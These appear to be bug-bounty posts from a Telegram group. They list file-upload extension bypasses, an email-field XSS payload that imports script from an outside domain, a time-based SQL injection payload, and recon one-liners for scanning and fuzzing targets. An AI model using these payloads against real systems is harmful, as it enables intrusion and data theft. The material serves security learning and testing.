Termux All Command [Telegram Group]

Github link : https://github.com/noperator/panos-scanner The next next sharing is simple script to check URLS in lists. 1. make sure you get some IPs (save in file 'lists') and panos-scanner.py is exist 2. run this script for url in $(cat lists); do echo ""; echo "==[ $url ]=="; ./panos-scanner.py -v -t $url -s | jq '.match'; done 3. you will see which alive or not

Laravel for Beginners & Intermediate https://drive.google.com/drive/mobile/folders/1FAu9fe1VVhYjUvB2j7jaaN3gmRUdK9Fz

1- Kali Linux Complete Course : https://lnkd.in/eVcMQgBc 2- Network Scanning Complete Course : https://lnkd.in/ea-xg5Tn 3- Metasploit Complete Course : https://lnkd.in/ex-Mz747

Common File UPload Extention Insecure File Upload: .NET .action, .asa, .asax, .ascx, .ashx, .asmx, .asp, .aspq, .aspx, .axd, .cer, .cfc, .cfchart, .cfm, .cfml, .cfr, .cgi, .coffee, .coffeec, .config, .cs, .cshtm, .cshtml, .csproj, .ctp, .dbm, .do, .dot, .ecr, .ejs, .es, .es6, .fti, .ftl, .haml, .handlebars, .handlebars.coffee, .handlebars.ecr, .handlebars.litcoffee, .hogan, .hogan.coffee, .hogan.ecr, .hogan.litcoffee, .hphp, .htaccess, .inc, .jade, .js, .jsm, .jsp, .jspf, .jspx, .jst, .jst.coffee, .jst.ecr, .jst.litcoffee, .jsv, .jsw, .less, .litcoffee, .marko, .master, .mjs, .module, .mustache, .mustache.js, .nunjucks, .pgif, .phar, .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .pht, .phtm, .phtml, .pl, .pug, .rem, .sass, .scaml, .shtml,.jsp, .slim, .sln, .soap, .ssi, .svc, .swf, .swig, .tpl, .tpl.coffee, .tpl.ecr .tpl.litcoffee, .vb, .vbhtm, .vbhtml, .vbproj, .volt, .wsdl, .wss, .xsd, .xsl, .yaws file.php%20file.php%0a file.php%00file.php%0d%0a file.php/ file.php.\ file.file.php file.pHp5file.png.php file.png.pHp5file.php#.png file.php%00.pngfile.php\x00.png file.php%0a.pngfile.php%0d%0a.png file.phpJunk123pngfile.png.jpg.php file.php%00.png%00.jpg --> You can Bruteforce with Burp which extention is allow in that server --> You can encoded by ascii and unicoded

🚨Subhunter- A fast subdomain takeover tool 🚨 👉Features: Auto update Uses random user agents Built in Go Uses a fork of fingerprint data from well known sources (can-i-take-over-xyz) 🔗Link- https://zurl.co/nx8R

Lots of python file : https://github.com/fortra/impacket/tree/master/examples

Bug-Bounty-Free-Resources ✅ https://github.com/RohanGiriSquad/Bug-Bounty-Free-Resources

XSS in an email address is underrated. (email is rarely sanitized by companies).Use catch-all and then you can also verify your account (if required). "><img/src/onerror=import('//domain/')>" @yourdomain .com #bugbounty #bug bounty tips

🔎 Recursive Fuzzing with WFUZZ 💻 wfuzz -c -z file,wordlist -R 3 --sc 301,200 target/FUZZ #bugbountytips #bugbounty

httpx -l hosts.txt -path /_fragment?_path=_controller=phpcredits&flag=-1 -threads 100 -random-agent -x GET -tech-detect -status-code -follow-redirects -title -mc 200 -match-regex "PHP Credits" #bugbounty #tips #

Time based SQL Injection using waybackurls waybackurls TARGET.COM | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt #sql_injection #bughunting

Cyber Security Cheatsheet : https://github.com/andrewjkerr/security-cheatsheets

VMware Fusion Pro and Workstation Pro are both now available free for Personal Use! Get all of the details: https://blogs.vmware.com/teamfusion/2024/05/fusion-pro-now-available-free-for-personal-use.html

Some Common Parameter in JSON: dest= path= window= next= site= reference= data= load= html= validate= page= return= callback= domain= view= dict= pdf= file= imageuri= url= key= oauth redirect=

Some Dorking Site: https://taksec.github.io/google-dorks-bug-bounty/ https://nitinyadav00.github.io/Bug-Bounty-Search-Engine/  https://dorks.faisalahmed.me/# https://thegrayarea.tech/5-google-dorks-every-hacker-needs-to-know-fed21022a906 https://hazanasec.github.io/2021-03-11-Dorking-on-Steriods/ https://mr-koanti.github.io/github.html

x-forwarded-host x-forwarded-for reflections in the response! This may lead to SSRF or XSS or caching vulns! link: https://lnkd.in/dcXgGXJn

$$$$Time-Based SQL Injection to Dumping the Database! Payload: ' AND if(now()=sysdate(),SLEEP(5),0)-- wXyW

🚨 XSS Hunting from WaybackURLS 🔍 Payload : waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls-xss.txt | sort -u -o urls-xss.txt && cat urls-xss.txt | kxss